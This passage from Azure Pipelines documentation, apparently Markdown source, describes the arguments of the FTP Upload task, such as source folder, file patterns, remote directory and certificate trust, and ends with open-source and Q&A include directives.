specified.</p> </td> </tr> <tr> <td>Source folder</td> <td>The source folder to upload files from. The default file path is relative from the root folder of the repo (same as if you had specified ```$(Build.SourcesDirectory)```).</td> </tr> <tr> <td>File patterns</td> <td>File paths or patterns of the files to upload. Supports multiple lines of match patterns. To upload the entire folder content recursively, specify <b>`**`</b>.</td> </tr> <tr> <td>Remote directory</td> <td>Upload files to this directory on the remote FTP server.</td> </tr> <tr> <td>Clean remote directory</td> <td>Recursively delete all contents of the remote directory before uploading.</td> </tr> <tr> <td>Overwrite</td> <td>Overwrite existing files in the remote directory.</td> </tr> <tr> <td>Trust server certificate</td> <td>Selecting this option results in the FTP server's SSL certificate being trusted with ftps://, even if it is self-signed or cannot be validated by a Certificate Authority (CA).</td> </tr> [!INCLUDE [temp](../_shared/control-options-arguments.md)] </table> ## Open source This task is open source [on GitHub](https://github.com/Microsoft/azure-pipelines-tasks). Feedback and contributions are welcome. ## Q & A <!-- BEGINSECTION class="md-qanda" --> [!INCLUDE [include](../_shared/qa-minimatch.md)] [!INCLUDE [temp](../_shared/build-step-common-qa.md)] [!INCLUDE [temp](../../_shared/qa-agents.md)] ::: moniker range="<= tfs-2018" [!INCLUDE [temp](../../_shared/qa-versions.md)] ::: moniker-end <!-- ENDSECTION -->
33.572917
603
0.690661
eng_Latn
0.872739